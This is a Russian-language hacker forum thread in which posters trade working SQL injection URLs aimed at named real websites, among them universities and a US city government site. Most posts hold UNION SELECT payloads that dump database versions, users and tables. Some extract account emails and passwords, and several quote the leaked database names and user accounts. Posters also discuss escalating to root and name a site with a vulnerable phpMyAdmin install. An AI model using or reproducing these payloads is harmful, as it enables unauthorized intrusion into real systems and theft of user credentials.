SQL Инъекции

http://www.airspirit.org/displayimage.php?id=1+union+select+1,2,3,4,5/*

 

http://shirley.ru/cat.php?id=-1+UNION+SELECT+user(),2/*

 

Ты бы раскручивал до конца

 

NOmeR1
А смысл?

до конца это рут на серваке.

 

[cash] он типа не просто подбор столбоц, а до раскрытия данных

 

*.aero

 

Code:

http://cartoons.sev.com.au/index.php?catid=-1+union+select+1,username,3,password,5,version(),7,8,9,10+from+user+limit+1,1/*

 

Code:

http://www.spu.edu/news/enews/tothepoint.asp?id=@@version--
http://www.spu.edu/news/enews/tothepoint.asp?id=(select%20system_user)

Code:

http://www.ncat.edu/~artsnsci/ExpandNews.php?Index=1'%20or%201=-1%20union%20select%201,2,3,version(),user(),6/*

 

4.1.22-standard
qmeca_db
qmeca_cv@localhost

 

как всегда((( рут на локалхосте ((

[email protected]
jcomm
4.1.22-log

 

Code:

http://www.vipcamera.net/?go=catalog&cid=17&gid=-1'+UNION+SELECT+USER(),DATABASE(),VERSION()/*

 

www.gaithersburgmd.GOV

Code:

http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=@@version--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(select%20system_user)

Code:

http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 EMAIL FROM ACCOUNTS)--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 PASSWORD FROM ACCOUNTS)--

далее =>
http://www.gaithersburgmd.gov/apps/myGaithersburg
&
http://alert.gaithersburgmd.gov

 

http://provodka.ru/news.php?part=4&id=-669+union+select+1/*

 

5.0.33-log
itmedia3
itmedia3@localhost

4.1.20
gented_db
[email protected]

4.1.21-standard-log
odimcom_dbodimhost1
odimcom_dbuodimh@localhost

 

www.mockva.ru - Недвижимость =\

Code:

http://www.mockva.ru/search.php?sr_id=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

www.mwd.hartford.edu

Code:

http://www.mwd.hartford.edu/news.php?id=-12+union+select+1,2,concat(user(),char(58),version()),4/*

 

Кроме этого, на серве в http://rus-opt.ru/phpmyadmin/ стоит дырявый предырявый phpMyAdmin 2.6.4-pl1, подвержен уязвимости удалённого или локального инклудинга.

 

http://www.fullthreadahead.com/classes/index.php?id=-100+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+25,1/*

 

gougle.ru

Code:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/*

Путег нашли:

Code:

/home/gougle/public_html/hotcd.php

А прав нету =)

Code:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7+from+mysql.user/*

 

Code:

http://www.socket.net/customer/newsletterview.php?id=-74+union+select+1,2,3,4,VERSION(),6/*

Code:

http://www.best-credit-card.biz/card-offer.php?id=-1214+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,VERSION(),62,63,64,65,66,67,68,69,70,71,72,73,74/*

 

И

Но в последнем при запросе с order by все в норме, а если

То вылазает ошибка в sql синтаксе